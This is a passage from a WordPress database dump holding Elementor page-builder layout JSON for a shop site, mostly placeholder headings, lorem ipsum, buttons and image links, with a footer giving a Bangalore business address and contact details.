#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8108,1434,'_elementor_page_assets','a:0:{}'),(8110,1435,'_elementor_edit_mode','builder'),(8111,1435,'_elementor_template_type','wp-page'),(8112,1435,'_elementor_version','3.7.7'),(8113,1435,'_wp_page_template','elementor_canvas'),(8114,1435,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: 